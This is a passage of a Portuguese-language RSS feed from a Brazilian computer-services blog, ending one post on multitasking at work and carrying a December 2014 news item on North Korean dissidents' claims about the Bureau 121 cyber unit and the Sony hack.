qualidade mais procurada por sua empresa. Será?&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
A maioria dos que se julgam supertaskers admite que aprendeu a ser assim
 administrando a própria vida, e uma grande parcela normalmente mistura 
as atividades de trabalho com suas atividades pessoais. Essa parece ser 
uma tendência... E você, como é? Consegue fazer diversas coisas ao mesmo
 tempo ou prefere uma de cada vez? Essa será uma tendência positiva, ou 
vai acabar sobrando menos tempo ainda para a vida fora do 
trabalho?&amp;nbsp;Deixe sua opinião nos comentários e participe! &lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2014/12/profissional-do-futuro-descubra-se-voce.html</link><author>noreply@blogger.com (Computers Service Informática)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-3161017620382824853</guid><pubDate>Sat, 20 Dec 2014 00:57:00 +0000</pubDate><atom:updated>2014-12-19T22:57:36.334-02:00</atom:updated><title>Hackers da Coreia do Norte querem atingir infraestrutura de inimigos</title><description>&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 18px;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;País tem trabalhado para destruir sistemas de serviços públicos, diz fonte.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;EUA acredita que Coreia do Norte é responsável por ciberataque à Sony.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMb2yCnBR7IQFIFgYaIYUfIzhk4zVSE8M6zGzbmGkVWKMyv1DJl2GkhJXCtwd7zttZRKI3apYGWxGyyaNc6rfNsAEDFrh1m46gCLtVmQNIAqjduwi5FU756NZfUJz9n4LGmLJs44MRC-4/s1600/hacker.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMb2yCnBR7IQFIFgYaIYUfIzhk4zVSE8M6zGzbmGkVWKMyv1DJl2GkhJXCtwd7zttZRKI3apYGWxGyyaNc6rfNsAEDFrh1m46gCLtVmQNIAqjduwi5FU756NZfUJz9n4LGmLJs44MRC-4/s1600/hacker.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;O ataque de hackers contra a Sony pode ter sido apenas uma aula prática para a elite do exército cibernético da Coreia do Norte,
 parte de uma meta de longo prazo para ser capaz de afetar sistemas de 
telecomunicações e de rede elétrica de países rivais, disseram 
dissidentes do país asiático.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Obcecada por temores de que será atacada pela Coreia do Sul e pelos 
Estados Unidos, a Coreia do Norte tem trabalhado há anos na capacidade 
de interromper ou destruir sistemas de computadores que controlem 
serviços públicos vitais como telecomunicações e eletricidade, de acordo
 com uma das fontes.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Capacidades não convencionais, como guerra cibernética e tecnologia 
nuclear, são as armas de escolha para que a empobrecida Coreia do Norte 
se equipare a seus inimigos. &quot;A principal meta da Coreia do Norte na 
estratégia cibernética é ser capaz de atacar a infraestrutura nacional 
da Coreia do Sul e dos EUA&quot;, disse Kim Heung-kwang, um dissidente do 
Norte que foi professor de ciências da computação e disse manter 
ligações com a comunidade de seu país natal.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Nesta sexta-feira (19/12/2014), os Estados Unidos culparam oficialmente a Coreia do Norte pelo ataque contra a Sony.
 &quot;A invasão da Sony é semelhante a ataques anteriores que foram 
atribuídos à Coreia do Norte, e é um resultado do treinamento e dos 
esforços feitos com o objetivo de destruir infraestrutura&quot;, disse Kim, 
que foi para o Sul em 2004.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;O ciberataque mais bem-sucedido até agora da Coreia do Norte pode ter 
sido a invasão aos sistemas da Sony, que fez com que o estúdio 
cancelasse o lançamento da comédia &quot;A entrevista&quot;, que retratava um 
plano fictício da CIA para assassinar o líder norte-coreano, Kim 
Jong-Un.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&quot;Eles podem ter treinado para lançar ataques relacionados às redes 
eletrônicas&quot;, disse Jang Seyul, dissidente da Coreia do Norte que 
estudou na faculdade militar de ciências da computação antes de escapar 
para o Sul há seis anos, referindo-se à unidade de guerra cibernética do
 Norte.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Há anos, a Coreia do Norte tem aplicado recursos em uma sofisticada 
célula de guerra cibernética chamada Bureau 121, comandada pela agência 
militar de espionagem e composta por alguns dos mais talentosos 
especialistas de computação no país, segundo Jang e outros dissidentes.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;A maioria desses hackers na unidade vem da escola militar de computação.
 &quot;O principal alvo que eles miram há tempos é a infraestrutura&#39;, disse 
Jang. &lt;/span&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2014/12/hackers-da-coreia-do-norte-querem.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMb2yCnBR7IQFIFgYaIYUfIzhk4zVSE8M6zGzbmGkVWKMyv1DJl2GkhJXCtwd7zttZRKI3apYGWxGyyaNc6rfNsAEDFrh1m46gCLtVmQNIAqjduwi5FU756NZfUJz9n4LGmLJs44MRC-4/s72-c/hacker.jpg" height="72" width="72"/><thr:total>0</thr:total></item></channel></rss>